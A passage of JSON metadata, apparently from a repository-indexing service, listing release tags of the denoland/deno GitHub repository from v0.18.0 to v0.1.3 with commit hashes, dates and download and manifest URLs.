oad.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at"